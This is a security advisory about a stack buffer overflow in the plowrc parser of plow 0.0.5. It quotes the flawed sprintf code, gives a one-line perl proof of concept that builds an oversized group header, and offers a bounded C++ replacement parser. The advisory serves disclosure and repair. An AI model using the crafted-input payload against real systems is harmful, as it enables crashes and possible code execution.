Plow 0.0.5 Buffer Overflow

2012-07-04T00:00:00
ID PACKETSTORM:114472
Type packetstorm
Reporter Jean Pascal Pereira
Modified 2012-07-04T00:00:00

Description

#################################################  
plow <= 0.0.5 Buffer Overflow Vulnerability  
#################################################  
  
Discovered by: Jean Pascal Pereira <pereira@secbiz.de>  
  
Vendor information:  
  
"plow is a command line playlist generator."  
  
Vendor URI: http://developer.berlios.de/projects/plow/  
  
#################################################  
  
Risk-level: Medium  
  
The application is prone to a local, stack-based buffer overflow while parsing its configuration file (plowrc).  
  
-------------------------------------  
  
IniParser.cpp, starting at line 26:  
  
26:     char buffer[length];  
27:     char group [length];  
28:  
29:     char *option;  
30:     char *value;  
31:  
32:     while(ini.getline(buffer, length)) {  
33:         if(!strlen(buffer) || buffer[0] == '#') {  
34:             continue;  
35:         }  
36:         if(buffer[0] == '[') {  
37:             if(buffer[strlen(buffer) - 1] == ']') {  
38:                 sprintf(group, "%s", buffer);  
39:             } else {  
40:                 err = 1;  
41:                 break;  
42:             }  
43:         }   
  
A bracketed line is copied into the fixed-size stack array group with sprintf(), which never bounds the write to the size of its destination.  
  
-------------------------------------  
  
Exploit / Proof Of Concept:  
  
Create a crafted plowrc file:  
  
perl -e '$x="A"x1096;print("[".$x."]\nA=B")'>plowrc  
  
-------------------------------------  
  
Solution:  
  
Bound every copy to the size of its destination (snprintf(group, length, "%s", buffer), or std::string instead of char arrays), and reject configuration lines that do not fit the buffer instead of truncating them.   
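As an added example (not plow's code), the parser below re-implements the group / option handling sketched above with bounded copies: lines are length-checked before anything is stored, group headers are validated, and std::string replaces the char[length] arrays so no write can exceed its destination. The names parse_ini, IniEntry, IniResult, make_poc and the kMaxLine limit are assumptions made for this example; make_poc builds the same content as the advisory's perl one-liner so the crafted file can be fed to the parser.

```cpp
// Added example, not code from plow or its author. Names are assumptions.
#include <cstddef>
#include <sstream>
#include <string>
#include <vector>

// Upper bound on an accepted line. Longer lines are rejected rather than
// copied into fixed-size storage; the value itself is arbitrary here.
static const std::size_t kMaxLine = 1024;

struct IniEntry {
    std::string group;
    std::string option;
    std::string value;
};

struct IniResult {
    bool ok = true;
    std::size_t bad_line = 0;          // 1-based number of the first rejected line
    std::vector<IniEntry> entries;
};

// Parse plowrc-style text: "#" comments, "[group]" headers, "option=value".
// Unlike the original, every line is length-checked before any copy and the
// group name is stored with a bounded std::string copy, not sprintf().
IniResult parse_ini(const std::string& text) {
    IniResult res;
    std::istringstream in(text);
    std::string line, group;
    std::size_t lineno = 0;

    while (std::getline(in, line)) {
        ++lineno;
        if (line.size() >= kMaxLine) {          // over-long line: reject, don't truncate
            res.ok = false; res.bad_line = lineno; return res;
        }
        if (line.empty() || line[0] == '#') continue;

        if (line[0] == '[') {
            // A header must be "[name]" with a non-empty name and nothing after it.
            if (line.size() < 3 || line.back() != ']') {
                res.ok = false; res.bad_line = lineno; return res;
            }
            group = line.substr(1, line.size() - 2);
            continue;
        }

        // "option=value": require a separator and a non-empty option name.
        std::size_t eq = line.find('=');
        if (eq == std::string::npos || eq == 0) {
            res.ok = false; res.bad_line = lineno; return res;
        }
        res.entries.push_back({group, line.substr(0, eq), line.substr(eq + 1)});
    }
    return res;
}

// Same content as the advisory's perl one-liner: "[" + n * "A" + "]\nA=B".
std::string make_poc(std::size_t n) {
    return "[" + std::string(n, 'A') + "]\nA=B";
}
```

With this parser the crafted file from the proof of concept is reported as a rejected first line instead of being copied into a stack array; a well-formed file yields its entries with the enclosing group attached to each one.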
  
-------------------------------------  
  
#################################################   